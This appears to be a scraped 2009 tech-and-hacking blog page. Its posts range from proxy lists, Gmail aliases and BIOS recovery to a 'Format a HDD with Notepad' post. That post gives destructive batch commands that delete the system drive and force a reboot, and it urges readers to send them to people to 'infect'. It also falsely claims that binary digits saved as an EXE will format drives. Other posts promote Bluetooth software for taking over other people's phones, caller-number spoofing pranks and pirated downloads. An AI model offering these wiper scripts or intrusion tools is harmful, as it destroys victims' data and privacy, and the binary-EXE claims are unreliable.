How To: Change Your Ip In Less Then 1 Minute

Wednesday, September 2, 2009

This article will help you to change your IP address within a minute. Just follow the following step and you will be thru.

1. Click on "Start" in the bottom left hand corner of screen
2. Click on "Run"
3. Type in "command" and hit ok

You should now be at an MSDOS prompt screen.

4. Type "ipconfig /release" just like that, and hit "enter"
5. Type "exit" and leave the prompt
6. Right-click on "Network Places" or "My Network Places" on your desktop.
7. Click on "properties"

You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks.

8. Right click on "Local Area Connection" and click "properties"
9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
10. Click on "Use the following IP address" under the "General" tab
11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).
12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
13. Hit the "Ok" button here
14. Hit the "Ok" button again

You should now be back to the "Local Area Connection" screen.

15. Right-click back on "Local Area Connection" and go to properties again.
16. Go back to the "TCP/IP" settings
17. This time, select "Obtain an IP address automatically"
tongue.gif 18. Hit "Ok"
19. Hit "Ok" again
20. You now have a new IP address

With a little practice, you can easily get this process down to 15 seconds.

P.S:
This only changes your dynamic IP address, not your ISP/IP address. If you plan on hacking a website with this trick be extremely careful, because if they try a little, they can trace it back

Hack Mobile Phones Through Bluetooth

Yes guys it is the mobile bluetooth hacker. It is a software which can be used to hack any mobile phone through bluetooth network. Once connected to a another phone via bluetooth you can do the following:

1) Call from his phone. It includes all call functions like hold etc.
2) Read his messages
3) Read his contacts
4) Change profile

5) Play his ringtone even if phone is on silent
6) Play his songs(in his phone)
7) Restart the phone
8) Switch off the phone
9) Restore factory settings
10) Change ringing volume

Notes:

1.) When connecting devices use a code 0000
2.) At start of programming on smartphones do not forget to turn on bluetooth before start of the application
What else you want
Just go and downlaod it
download

Prevent spam in your Gmail account

Monday, August 31, 2009

Learn How To Hack
Are you worried about spam in your precious gmail account ?

If yes, then you would like to consider making aliases of your gmail id to use when you're not sure whether you're signing up for something safe or not.


It is a very simple task to provide an alias of your gmail id. Whenever you sign up on the internet on some site that you think may not be safe (or a site which might send you spam),all you have to do is give out the email address as
For example if your email id is james@gmail.com,you can provide james+21@gmail.com or james+test@gmail.com .You can put anything after the + and all email sent will still go to your gmail account.

In the event that you did give your email to a spammer and you start receiving spam, don't worry! Just create a filter, and make everything that is sent to username+whateveryouputhere@gmail.com go to the trash. This way all the spam that you might get will automatically be deleted.

PROXY SITES LIST

Many schools, universities, offices, ISPs and countries like Saudi Arabia, China, Pakistan, Burma, Iran, North Korea, Vietnam ,Cuba, Syria, Tunisia ,Uzbekistan, Egypt, Belarus and Turkmenistan don't allow their surfers to access some web sites which them deem inappropriate.

http://proxiesrus.com
http://www.surfindark.com
http://www.navydog.com
http://falsario.com
http://www.cheekyproxy.com
http://www.funkyproxy.com
http://www.surfsneaker.com
http://www.proxii.com
http://www.proxynumber1.com (Replace 1 with any number between 1 to 10) http://myspaceproxyy.com
http://tenpass.com
http://www.browsesneaky.com
http://www.proogle.info http://greatproxy.info
http://www.playnsurf.info
http://www.realproxy.info
http://aplusproxy.com
http://www.ecoproxy.com
http://freedom.webtuo.com
http://www.proxyz.us
http://www.sneakschool.com
http://www.iphide.com
http://www.slyuser.com/
http://pawxy.com
http://pawxy.org
http://browseanywhere.info
http://www.404surf.com
http://www.cloakip.net
http://aniscartujo.com/webproxy
http://www.browsedark.com
http://www.dartprox.com
http://www.proxish.com
http://www.surfsneak.com
http://www.surfsneaky.com
http://www.browsehidden.com
http://www.filterhide.com
http://www.browsesneak.com
http://www.eggproxy.com
http://www.theschoolcloak.com
http://www.badboysproxy.com
http://www.surfscreened.com
http://www.hidemefast.com
http://urlbrowse.com
http://www.hideipaddress.net
http://www.sneakfilter.com
http://www.browsestealth.com
http://www.sneak1.info
http://underproxy.com
http://www.proxypit.com
http://www.proxypan.com
http://myspacewebproxy.org/
http://www.proxyzip.org
http://www.hagiomusic.info
http://www.greenpips.info
http://www.allfreehere.info
http://www.takefreely.info
http://logu.in
http://autobypass.com
http://www.proxcity.info

KILL MOSQUITOES WITH YOUR COMPUTER

Stop using chemical based Insecticides to kill mosquitoes, because you might kill yourself.

Download these Anti Mosquito software to repel those annoying insects and be safer & greener

How does it work?

Dragonflies are the mortal enemy for mosquitoes and in flight they generate sound frequencies (approximately) between 67 Hz and 45 Hz, depending on their sizes.

56 Hz is a good average number in between those frequencies. Your PC sound card and speakers will work well for this purpose. There are many sound and tone generator programs available on the internet for both the Mac and Windows PC. Setup your computer with the sound/tone generator program running and then play the sound through your computer speakers. The speakers can be aimed directionally for complete room coverage.

The sound level on the speakers should be adjusted so it is barely audible. This arrangement can be setup in a bedroom where you would like to have the window open but are worried about mosquitoes. One speaker should be fairly close to where you are sleeping.

Here are some links to more advanced tone generator software which can actually sweep between the 45 Hz and 67 Hz frequencies:

http://www.nch.com.au/tonegen/index.html

Get a trial version for 30 days CLICK HERE

Format a HDD with Notepad

Sunday, August 30, 2009

If you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined.In this hack I will show you how to format a HDD using a notepad. This is really cool.


Step 1.
Copy The Following In Notepad Exactly as it says

01001011000111110010010101010101010000011111100000

Step 2.
Save As An EXE Any Name Will Do

Step 3.
Send the EXE to People And Infect

OR

IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X -- this will format your drive c:\

01100110011011110111001001101101011000010111010000 100000011000110011101001011100

0010000000101111010100010010111101011000


format d:\ /Q/X -- this will format your dirve d:\

01100110011011110111001001101101011000010111010000 100000011001000011101001011100

0010000000101111010100010010111101011000


format a:\ /Q/X -- this will format your drive a:\


01100110011011110111001001101101011000010111010000 100000011000010011101001011100

0010000000101111010100010010111101011000


del /F/S/Q c:\boot.ini -- this will cause your computer not to boot.


01100100011001010110110000100000001011110100011000 101111010100110010111101010001

00100000011000110011101001011100011000100110111101 101111011101000010111001101001

0110111001101001

try to figure out urself rest
cant spoonfeed
its working

Do not try it on your PC. Don't mess around this is for educational purpose only

still if you cant figure it out try this

go to notepad and type the following:

@Echo off
Del C:\ *.*|y

save it as Dell.bat

want worse then type the following:

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

and save it as a .bat file

Top 10 Tricks to exploit SQL Server Systems

Whether it is through manual poking and prodding or the use of security testing tools, malicious attackers employ a variety of tricks to break into SQL Server systems, both inside and outside your firewall. It stands to reason then, if the hackers are doing it, you need to carry the same attacks to test the security strength of your systems. Here are 10 hacker tricks to gain access and violate systems running SQL Server.

1. Direct connections via the Internet

These connections can be used to attach to SQL Servers sitting naked without firewall protection for the entire world to see (and access). DShield's Port Report shows just how many systems are sitting out there waiting to be attacked. I don't understand the logic behind making a critical server like this directly accessible from the Internet, but I still find this flaw in my assessments, and we all remember the effect the SQL Slammer worm had on so many vulnerable SQL Server systems. Nevertheless, these direct attacks can lead to denial of service, buffer overflows and more.

2. Vulnerability scanning

Vulnerability scanning often reveals weaknesses in the underlying OS, the Web application or the database system itself. Anything from missing SQL Server patches to Internet Information Services (IIS) configuration weaknesses to SNMP exploits can be uncovered by attackers and lead to database server compromise. The bad guys may use open source, home-grown or commercial tools. Some are even savvy enough to carry out their hacks manually from a command prompt. In the interest of time (and minimal wheel spinning), I recommend using commercial vulnerability assessment tools like QualysGuard from Qualys Inc. (for general scanning), WebInspect from SPI Dynamics (for Web application scanning) and Next Generation Security Software Ltd.'s NGSSquirrel for SQL Server (for database-specific scanning). They're easy to use, offer the most comprehensive assessment and, in turn, provide the best results. Figure 1 shows some SQL injection vulnerabilities you may be able to uncover.

sql hacker fig1

Figure 1: Common SQL injection vulnerabilities found using WebInspect.

3. Enumerating the SQL Server Resolution Service

Running on UDP port 1434, this allows you to find hidden database instances and probe deeper into the system. Chip Andrews' SQLPing v 2.5 is a great tool to use to look for SQL Server system(s) and determine version numbers (somewhat). This works even if your SQL Server instances aren't listening on the default ports. Also, a buffer overflow can occur when an overly long request for SQL Servers is sent to the broadcast address for UDP port 1434.

4. Cracking SA passwords

Deciphering SA passwords is also used by attackers to get into SQL Server databases. Unfortunately, in many cases, no cracking is needed since no password has been assigned (Oh, logic, where art thou?!). Yet another use for the handy-dandy SQLPing tool mentioned earlier. The commercial products AppDetective from Application Security Inc. and NGSSQLCrack from NGS Software Ltd. also have this capability.

5. Direct-exploit attacks

Direct attacks using tools such as Metasploit, shown in Figure 2, and its commercial equivalents (CANVAS and CORE IMPACT) are used to exploit certain vulnerabilities found during normal vulnerability scanning. This is typically the silver-bullet hack for attackers penetrating a system and performing code injection or gaining unauthorized command-line access.



Figure 2: SQL Server vulnerability exploitable using Metasploit's MSFConsole.

6. SQL injection

SQL injection attacks are executed via front-end Web applications that don't properly validate user input. Malformed SQL queries, including SQL commands, can be inserted directly into Web URLs and return informative errors, commands being executed and more. These attacks can be carried out manually -- if you have a lot of time. Once I discover that a server has a potential SQL injection vulnerability, I prefer to perform the follow-through using an automated tool, such as SPI Dynamics' SQL Injector, shown in Figure 3.

Figure 3: SPI Dynamics' SQL Injector tool automates the SQL injection process.

7. Blind SQL injection

These attacks go about exploiting Web applications and back-end SQL Servers in the same basic fashion as standard SQL injection. The big difference is that the attacker doesn't receive feedback from the Web server in the form of returned error messages. Such an attack is even slower than standard SQL injection given the guesswork involved. You need a good tool for this situation, and that's where Absinthe, shown in Figure 4, comes in handy.


Figure 4: Absinthe tool takes the pain out of blind SQL injection testing.

8. Reverse engineering the system

The reverse engineering trick looks for software exploits, memory corruption weaknesses and so on. In this sample chapter from the excellent book Exploiting Software: How to Break Code by Greg Hoglund and Gary McGraw, you'll find a discussion about reverse engineering ploys.

9. Google hacks

Google hacks use the extraordinary power of the Google search engine to ferret out SQL Server errors -- such as "Incorrect syntax near" -- leaking from publicly accessible systems. Several Google queries are available at Johnny Long's Google Hacking Database. (Look in the sections titled Error Messages and Files containing passwords.) Hackers use Google to find passwords, vulnerabilities in Web servers, underlying operating systems, publicly available procedures and more that they can use to further compromise a SQL Server system. Combining these queries with Web site names via Google's 'site:' operator often turns up juicy info you never imagined you could unearth.

10. Perusing Web site source code

Source code can also turn up information that may lead to a SQL Server break in. Specifically, developers may store SQL Server authentication information in ASP scripts to simplify the authentication process. A manual assessment or Google could uncover this information in a split second.

How to call your friends with their own number



Hello Friends after "Make Free Phone Calls From PC to mobile for free" hack today I am sahring With you a extremely Nice Prank or you can simply say Hack i.e "How To Call Your Friends From THeir Own Cell Number".
Mobile hack to call your friends:

1. Go to http://www.mobivox.com/ and register there for free account.

2. During registration, remember to insert Victim mobile number in "Phone number" field as shown below.

3. Complete registration and confirm your email id and then login to your account. Click on "Direct WebCall".



4. You will arrive at page shown below. In "Enter a number" box, select your country and also any mobile number(you can enter yours). Now, simply hit on "Call Now" button to call your friend with his own number.



5. That's it. Your friend will be shocked to see his own number calling him. I have spent last two days simply playing this cool mobile hack prank.

Camfrog pro



The best NEW live webcam chat community. • Join live webcam chat rooms or host your own for free.
• Blazing fast streaming video and amazing audio quality.
• Camfrog works behind firewalls, routers and wireless networks.
• A live webcam user photo directory makes it easy to meet new people.
• Download Camfrog and join a multi-user videoconference right now!

Video Chat Rooms (3089) webcam chatrooms available now!
See and hear many people at a time in one of the many multi-user audio/video rooms listed here and hosted independently by Camfrog users. Users with a fast connection can host their own multi-user videoconference free!
User Directory (63192) users online now!
Find someone to videochat with 1-on-1 using live streaming audio and video with our live webcam user directory. View photos of people currently online and search for Camfrog users in your area. It's easy to see if users are male or female and if they have a camera. It's a free chat line with video too!


Link :
http://rapidshare.com/files/104945713/Camfrog3.91.22594.rar

100% working utorrent accelerator

TO DOWNLOAD UTORRENT 1.8.4 CLICK BELOW
µTorrent - a (very) tiny BitTorrent client

TO DOWNLOAD UTORRENT ULTRA ACCELERATOR CLICK BELOW

A Powerhouse With a Tiny Appetite

µTorrent - a (very) tiny BitTorrent client

 


PSP MOVIE CREATOR

Saturday, August 29, 2009

--
http://rapidshare.com/files/4794348/psp_movie_creator_full.rar
--
http://rapidshare.com/files/2449103/psp_movie_creator_completo.rar
--

Download panda cloud


Simply...Evolution

Free Antivirus
Download

Easy Easy

Panda Cloud Antivirus is truly install and forget. Don’t worry about updates, configuration or complicated decisions ever again.

Secure Secure

Panda Cloud Antivirus provides you with the fastest protection against the newest viruses thanks to its cloud-scanning from PandaLabs’ servers.

Light Light

Panda Cloud Antivirus protects you while you browse, play or work and you won’t even notice it. It is extremely light as all the work is done in the cloud.

How To: Make a Google SMS Channel

Friday, August 28, 2009

Google Labs India has introduced a feature (it’s no longer new, a LOT of people are using it!) called Google SMS Channels for Indian Users.
The Basic concept behind this service is that people can get access to updates from websites which offer RSS feeds directly to their Mobiles instead of having to go Online to Check for them in services such as Google Reader, via Internet Explorer/Mozilla or via RSS software such as Great News… Websites which provide RSS feeds include News websites like The Hindu and The Times of India, Sports Websites (particularly cricket websites, so the whole of India should be headed to Google now!) and interestingly, personal and professional blogs have RSS feeds too, which means that when You Update your Blog next time, People can get an update about it on their mobile phones! Talk about Popularity!
Now here’s the deal- I’ll tell you how to make an SMS Channel in Google Labs and you’ll tell me what it is and I’ll join it! Sounds good??
Here goes…
Step 1. Open Google Labs
google labs
Scroll Down a bit and you will come to the Link saying Google SMS Channels
At this point, If you have not yet logged into your Google Account (basically your Gmail Account, but now it’s a universal login which you can use for all your Google Services…), then you will be asked to do so.
Since this is the first time you are logging into Google SMS Channels, you will be asked to fill up a Nickname and your Mobile Number for verification. IMP- Keep Your Cell Phone Handy for this step!
Step 2. Fill up a nice NickName for yourself and before you enter your mobile number, click on the button besides the name and verify that you have it!
Next, fill up your mobile phone number and click on the Verify Button… Within a few seconds, you will recieve a verification code on your mobile as an sms and the page on your screen will change to allow you Accept the Terms & Conditions of use and fill up the verification code from your mobile…
Once you’ve done that, Congratulations! You are ready to use Google SMS Channels!

New Google Talk Labs Edition


 



















There’s a new version of Google Talk: the Labs edition, a desktop client that looks very similar to the Google Talk gadget and has most of its features.

The application doesn’t support voice chat or file transfer, but it has some new features: it lets you launch Google Calendar and Orkut, while including notifications for Google Calendar events and Orkut scraps.

The new Google Talk uses WebKit to render some parts of the interface. And now, Desktop notifications from the following services:

  • Gmail
  • Calendar (with a new snooze option!)
  • Orkut
Its not worth to switch from the full-featured client to the Labs edition : group chats, smilies, tabs while the missing features are more important. A better decisions would have been to integrate these new features in the desktop client, instead of releasing a separate application.

Btw, you can download The Google Talk Labs Edition at Here.

Our Future Laptop in 2015

"Between now and 2015, we expect to see a series of big changes that will redefine what a notebook is and what it looks like," said Mike Trainor, Intel Corp.'s evangelist for mobile products.With crystal ball in hand, we talked to designers, engineers and marketers about how notebooks are likely to change over the next seven years.

Concepts for the future

First, let's take a look at some concept notebooks. Just as futuristic show cars give us insight into what we might be driving in the future, concept notebooks offer a sneak peek at how we'll be computing.

These concept notebooks typically are created by independent designers and firms retained by laptop vendors. This is highly secretive business -- the designers we spoke were willing to talk about some of their concepts but couldn't tell us who they were working for.

Rarely does a concept notebook make it to the real world as a whole unit, but certain aspects often make it into production. Early 1990s concept devices contained integrated pointing devices, speakers and webcams, all of which are now standard equipment. It's likely that at least some of the new ideas, components and features showcased below will be coming to a notebook near you.

For example, several concept laptops rely on touch-sensitive screens that act as the system's keyboard and mouse and go beyond today's multi-touch technology. Imagine being able to slide your finger across the screen to immediately shut off the display and keep what you're working on confidential, and you get an idea of its potential.


Compenion

The Compenion concept notebook from independent designer Felix Schmidberger in Stuttgart, Germany, borrows heavily from slider cell phones to move beyond the clamshell. Rather than lifting the lid open, just slide it up.

Compenion

The pair of superbright organic LED panels slide into place next to each other, with the lower panel acting as keyboard or scribble pad. The whole thing is only three-quarters of an inch thick.

"It reduces thickness, but the slider was more about the feel of using the notebook," said Schmidberger. "The idea is to break free from traditional notebook hardware without having to adapt to new ways of using a computer."

Together, the 11-in. screens will yield about 16 inches of usable workspace, so the system has the dimensions and weight of a thin and light system but the screen of a larger one.


Canova

Dual-screen systems could well be the rage in seven years. The Canova from V12 Design, a Milan, Italy-based design firm, is closer to the tried and true clamshell layout, but with a twist.

Canova Dual Screen

Instead of a display and a mechanical keyboard, the device has two touch-sensitive displays: The upper screen is primarily for viewing applications, and the lower screen is for the mundane activities of typing, drawing and jotting notes. But the Canova can also lie flat for a large expanse of working space.

According to designer Valero Cometti, "the idea was to close the gap between man and machine." This notebook changes personality depending on how it's held. Opened all the way, it's a sketch pad. Fold it half open and rotate it 90 degrees, and it's an e-book. By emulating a musical keyboard on the lower half, when it's flat on a table, it can be a go-anywhere piano.


Siafu

Who needs a screen at all? Long Beach, Calif.-based independent designer Jonathan Lucas' eccentric Siafu concept can touch you, literally. That's because Siafu is for the blind and has no screen.

"The idea was to open a new realm of digital interface for the visually impaired by enhancing and even surpassing existing technologies that currently cater to this group," said Lucas.

Siafu Computer
Because the blind can't see what's on the screen, Siafu converts images into corresponding 3-D shapes that are created with Magneclay, an oil-based synthetic material that instantly forms shapes in response to electrical fields.

In such hands-on computing, you interact with Siafu with your fingers to feel the bumps and protrusions that pop up. The Magneclay surface could be used for reading a Braille newspaper, feeling the shape of someone's face or going over a tactile representation of a blueprint.


Cario

Imagine a system that is at home in a car, in an Internet café or on a hotel desk, and you have the job description of Anna Lopez' Cario.
"The concept offers several ways of working on the move or at a desk," explained U.K.-based independent designer Lopez.
Equal parts form, function and fashion, this concept replaces the traditional lid hinge with a shiny bar that -- as the name implies -- is a carrying handle. It also allows the lid to fold up for travel and can be converted into a an easel or sit on a car's steering wheel.

Cario, Car Laptop
Not surprisingly, then, Cario comes into its own on the road. So the driver doesn't get cross-eyed or crook-necked by looking down at the screen when it's locked into the steering wheel, Cario has a microprojector that projects its images onto the vehicle's windshield. This heads-up display can show maps, videoconferences and find the closest gas station.


Changing materials

Some changes and new functionality in the laptops we'll use in 2015 will come about because of significant advances in the materials used to create the devices. Magneclay is just one example.

Another example is a change in the plastics used in the notebook case. In fact, by 2015, dropping a notebook might not be the catastrophe it can be today.

That's because a group at UCLA's Exotic Materials Institute led by Fred Wudl has come up with an epoxy that's strong, durable and can repair itself. Called Automend, small cracks can be sealed by just heating the surface with a hair dryer, making it a godsend for the clumsy among us.

Another example relates to peripherals used on the road. For instance, future mobile systems could easily include projectors, which will be reduced to about the size of a pack of cigarettes by 2015.
Because such projectors use a laser, "you can project images on a wall within a distance of several meters without having to adjust a lens," said Schmidberger. "It can even be bumpy or bent."


Powerful components

It doesn't take a very clear crystal ball to know that the next generation of notebooks will deliver much more computing power. And notebooks will also get smarter as components continue to shrink and more components get squeezed onto a sliver of silicon the size of a fingernail.

The result will be that notebooks will be able to perform tasks that we can only dream of today. Here's what our experts say those components will look like and what they'll be able to do.


Processors

It's a sure bet that we won't be using a mere single- or double-core processor by 2015. Most notebooks will have at least six computational cores, if not eight, according to the experts we contacted.

Such technology is available today, so it surely will be standard-issue on laptops of the future, the experts agreed. Having at least six computational cores at your disposal will not only make high-end simulations and data visualizations possible, but will also make for one heck of a game of Halo.
Missing your bus

The CPU's front-side bus will likely disappear by 2015. The bus acts like a traffic cop, sending data to the different parts of the system at a slower speed than the computational core. In its place will be an integrated controller that makes this distribution of data much more efficient by operating faster.

As with multiple-core processors, this trend is already under way -- Intel, for instance, has announced that its Nehalem CPU microarchitecture, set to debut later this year, will feature an integrated memory controller, eliminating the need for a front-side bus. However, it will take a long time for this trend to reach CPUs used in notebook computers -- the 2015 time frame seems reasonable, the experts agreed.


Storage

With most notebooks having built-in wireless broadband connections, a new onslaught of data is expected. As a result, where we'll store our accumulated files will be transformed.

According to Intel's Trainor, we'll see ever-more storage capacity in smaller and smaller packages, along with solid-state memory that is lighter and faster, while being more rugged and using less power.

Currently, adding 64GB of solid state capacity to a notebook's hard drive runs an extra $1,000. By 2015, the typical mainstream notebook could be outfitted with a 2TB hard disk drive, which should be plenty of room for even the biggest data hog, the experts speculated. For smaller and lighter machines, look to having something like 250GB of flash memory at your disposal, but it will likely come at a small premium.

There will be a new type of storage as well that has can boost performance, said Intel's Trainor. Currently, with Windows Vista, a USB flash memory key can act as an intermediate data cache for the system's hard drive.

This makes the most-used data more quickly available for the processor, streamlining its operation. Called Turbo or Robson memory, this technique will go into overdrive when the flash memory is put on the motherboard for faster access, Trainor noted.


Displays

We'll look at our notebooks in a different light in 2015 as sequential red, green, blue LED backlighting replaces the cold cathode fluorescent lighting tubes found in today's LCD screens. This technology will not only offer brighter images, but will also use less power.

Ultimately, organic LEDs will take over, although they may not be ready in time for a 2015 system in the sizes and quantities required for mass production. Because they make their own light, OLEDs can be made thinner than today's screens.

OLED Laptop
These screens have been used on phones for several years, and Sony's XEL-1 is the first TV to have an OLED display. Its 11-in. OLED screen is just over a tenth of an inch thick.
"We're very excited about OLEDs," said Trainor. "They're capable of producing beautiful, rich colors and using less power. It adds another choice."
In a more speculative vein, in seven years, we just might have 3-D displays that show the world as it really is. This will not only be great for gamers, but it can aid in representing complex data and displaying computer-aided designs.

Such displays could also revamp the way we interact with our desktops. Imagine an on-screen desktop that, rather than a flat expanse, has depth and perspective so that you can hide your list of passwords behind the icon for opening your Web browser.


More, better power

Most experts agree that future notebooks will be just as limited by battery life as they are now. But that doesn't mean we won't see significant advances in mobile power supplies -- such advances will be necessary to keep up with all the extra power.

While fuel cells that turn methanol into power showed promise over the past few years, batteries will continue to dominate the power scene. However, there will be a move from lithium-ion cells that have to be made in cylinders to lithium polymer cells that can be formed in a variety of shapes and sizes.
"This allows notebook designers to fill small nooks and crannies of a notebook with extra batteries," explained Trainor.
Powering up could also change with inductive charging, which is key to both the Compenion and Cario concept notebooks. Rather than plugging a cord into the notebook to charge it, you just put the notebook on a special surface that has an inductive power pad, and juice is sent wirelessly to charge the battery.

The payoff is that there's no AC power adapter to carry, but this new method of charging devices will work only if enough charging pads are available. They'd need to be at cafes, hotels and even on airliner tray tables. This technology is ready today, although it is a long way from being adopted widely enough to be useful.

"Inductive charging," said Lopez, "would allow easy access and a secure way to charge."

An innovative mobile approach to power is taken by Nikola Knezevic, a Serbian designer who has turned the clamshell format on its head with solar panels. His concept design, called, not surprisingly, the Solar Laptop Concept, has an extra hinged lid covered with solar cells that can be adjusted to get the most out of the sun.

Solar Laptop
It'll add a few tenths of an inch to the system's thickness and won't be able to fully charge the system, but when you're done, just fold it up and go.

Still, Trainor, who avidly follows developments of technologies such as solar power, cautioned against becoming too optimistic that this type of technology will make it easier to keep laptops of the future charged.

Run Mac OS X from USB Stick

Thursday, August 27, 2009

First, prepare all that need:

* USB Flash Disk (min. 2 GB required). You can use many types for this USB disk, such as USB Stick, USB Pendrive, ZIP Disk, your iPod, SD or MMC card, extrenal hard drive, etc.

* JaS Mac OS X 10.4.x Retail DVD

* Pacifist software. Download here.

OK. Ready? Now plug your USB Disk, and it will be mounted automatically.

Open Disk Utility (Applications->Utilities)
Select your USB Disk device in the left menu, and click the partition tab.
Enter a nice name for your device like osx86.
Hit Options... button, and choose Master Boot Record.
From the drop-down, choose 1 partition as the volume scheme.
Be sure the filesystem is Mac OS Extended (Journaled),
Hit the Partition button.
Next, we need to enable Owners, open a Terminal and type:

sudo /usr/sbin/vsdbutil -a /Volumes/osx86

Mount the JaS 10.4.x DVD or the Retail 10.4.x DVD.
Browse to the directory System/Installation/Packages on the DVD.
Open OSInstall.mpkg with pacifist (right-click->Open With Pacifist).
Expand Contents of EssentialSystemSoftware, then expand Contents of
EssentialSystemSoftwareGroup.

Select Contents of BaseSystem.pkg and Contents of Essentials.pkg and
right-click and choose Install to Other disk...

Choose your USB Disk (osx86) and hit the install button. Now be patient :-)
Now depending on what DVD you used, you will need to download the
right update from apple.com. I downloaded the 10.4.8 Intel update since I used
10.4.7 retail DVD.

Open MacOSXUpd10.4.8Intel.pkg with Pacifist and install to Other disk...

N.B.: Before installing the update, you may need to free some space on the USB Disk.
Just delete the asiatic font files in /System/Library/Fonts (= 100 MB bonus).

Since we installed with Pacifist, some of the files are missing. We need to copy them.
Get them from a full 10.4.8 working install. Those files are:

/System/Library/CoreServices/SetupAssistant
/Applications/Safari.app
/Applications/Address Book.app
/Library/Receipts/BaseSystem.pkg
/Library/Receipts/Essentials.pkg

You need to replace the following files:

/mach_kernel by semthex SSE3 or SSE2 kernel
/System/Library/Extensions/AppleACPIPlateform.kext
/System/Library/Extensions/AppleSMBIOS.kext

Optional:

/System/Library/Extensions/IONetworkingFamily.kext
/System/Library/Extensions/AppleIntelIntegratedFrameBuffer.kext (GMA950)

Add this for PS2 keyboard/mouse:

/System/Library/Extensions/ApplePS2Controller.kext

Put all your custom kext you use on your working install.

Do not forget to chmod -R 755 and chown -R root:wheel all files you copy.

Be sure that you have bless version 24.0 from 10.4.4.
Any other version of bless won't work.
Run bless -version in Terminal to check version.

sudo bless –verbose –folder
“/Volumes/osx86/System/Library/CoreServices” –bootinfo

Now, Repair permissions
Open Disk Utility.app, select your USB Disk and repair permissions.

Then set partition to active
Open a Terminal, be sure your USB Disk is plugged in

> sudo -s
> diskutil list

> /dev/disk1
#: type name size identifier
0: FDisk_partition_scheme *1.9 GB disk1
1: Apple_HFS osx86 1.9 GB disk1s1

Note that here the USB Disk is disk1 (disk1s1).

> fdisk -e /dev/rdisk1

Enter 'help' for information

fdisk: 1> p

Disk: /dev/rdisk1 geometry: 999/64/63 [4028416 sectors]
Offset: 0 Signature: 0xAA55
Starting Ending
#: id cyl hd sec - cyl hd sec [ start - size]
-------------------------------------------------------------
*1: AF 0 1 1 - 1023 254 63 [ 63 - 4028346] HFS+
2: 00 0 0 0 - 0 0 0 [ 0 - 0] unused
3: 00 0 0 0 - 0 0 0 [ 0 - 0] unused
4: 00 0 0 0 - 0 0 0 [ 0 - 0] unused

First time you do this, you should not see the star in front of partition 1.
We need to activate the partition.

fdisk: 1> f 1
Partition 1 marked active.
fdisk:*1> write
Device could not be accessed exclusively.
A reboot will be needed for changes to take effect. OK? [n] y
Writing MBR at offset 0.

During the first boot to OS X from the USB Disk,
you'll have to finish the installation setup.
For the first boot, you need to boot to your current working system.
And specify following boot flags:

mach_kernel -v rd=disk1s1

Notice that we specified disk1s1 from previous diskutil list command.

Next boot should be directly to the USB Disk,
so don't forget to enable USB boot in BIOS.
And set USB Flash boot order before harddrive.

Bring your osx86 with you and test it on any PC with SSE2/SSE3 processor like
Intel Pentium 4, Intel Pentium D, AMD Athlon XP, etc.
Enjoy it!

Recovering a Corrupt AMI BIOS chip

With motherboards that use BOOT BLOCK BIOS it is possible to recover a corrupted BIOS because the BOOT BLOCK section of the BIOS, which is responsible for booting the computer remains unmodified.

When an AMI BIOS becomes corrupt the system will appear to start, but nothing will appear on the screen, the floppy drive light will come on and the system will access the floppy drive repeatedly. If your motherboard has an ISA slot and you have an old ISA video card lying around, put the ISA video card in your system and connect the monitor.

The BOOT BLOCK section of the BIOS only supports ISA video cards, so if you do not have an ISA video card or your motherboard does not have ISA slots, you will have to restore your BIOS blind, with no monitor to show you what’s going on.

AMI has integrated a recovery routine into the BOOT BLOCK of the BIOS, which in the event the BIOS becomes corrupt can be used to restore the BIOS to a working state.

The routine is called when the SYSTEM BLOCK of the BIOS is empty. The restore routine will access the floppy drive looking for a BIOS file names AMIBOOT.ROM, this is why the floppy drive light comes on and the drive spins.

If the file is found it is loaded into the SYSTEM BLOCK of the BIOS to replace the missing information. To restore your BIOS simply copy a working BIOS file to a floppy diskette and rename it AMIBOOT.ROM, then insert it into the computer while the power is on.

The diskette does not need to be bootable or contain a flash utility. After about four minutes the system will beep four times. Remove the floppy diskette from the drive and reboot the computer. The BIOS should now be restored.

Recovering a Corrupt AWARD BIOS

With AWARD BIOS the process is similar but still a bit different. To recover an AWARD BIOS you will need to create a floppy diskette with a working BIOS file in .BIN format, an AWARD flash utility and an AUTOEXEC.BAT file. AWARD BIOS will not automatically restore the BIOS information to the SYSTEM BLOCK for this reason you will need to add the commands necessary to flash the BIOS in the AUTOEXEC.BAT file.

The system will run the AUTOEXE.BAT file, which will in turn flash the BIOS. This is fairly easy. Here are the steps you need to take.

· Create a bootable floppy diskette
· Copy the BIOS file and flash utility to the diskette
· Create an text file with any standard text editor and add the following lines

@ECHO OFF
FLASH763 BIOSFILE.BIN /py

In the above example I am assuming that you are using the FLASH763.EXE flash utility. You will need to replace the FLASH763 with the name of whatever flash utility you are using, and replace the BIOSFILE.BIN with the name of the BIOS file you are using.

You will also need to change the ‘/py’ to whatever the command is for your flash utility to automatically program the BIOS without user intervention. If you do not know the command to automatically flash your BIOS type the name of the flash utility with a space and then /? to display the utility’s help Publish Postscreen.

The help screen should pecify the command switch to automatically flash your BIOS. If you are using the FLASH763.EXE utility then the switch to automatically flash your BIOS is ‘/py’.

Boot Block Recovery For Free

You don't need to pay a measly sum of dollars just to recover from a boot block mode. Here it is folks:

AWARD Bootblock recovery:

That shorting trick should work if the boot block code is not corrupted, and it should not be if /sb switch is used when flashing the bios (instead of /wb switch).

The 2 pins to short to force a checksum error varies from chip to chip. But these are usually the highest-numbered address pins (A10 and above).

These are the pins used by the system to read the System BIOS (original.bin for award v6), calculate the ROM checksum and see if it's valid before decompressing it into memory, and subsequently allow Bootblock POST to pass control over to the System BIOS.


You just have to fool the system into believing that the System BIOS is corrupt. This you do by giving your system a hard time reading the System BIOS by shorting the 2 high address pins. And when it could not read the System BIOS properly, ROM Checksum Error is detected "so to speak" and Bootblock recovery is activated.

Sometimes, any combination of the high address pins won't work to force a checksum error in some chips, like my Winbond W49F002U. But shorting the #WE pin with the highest-numbered address pin (A17) worked for this chip. You just have to be experimentative if you're not comfortable with "hot flashing" or "replacement BIOS".

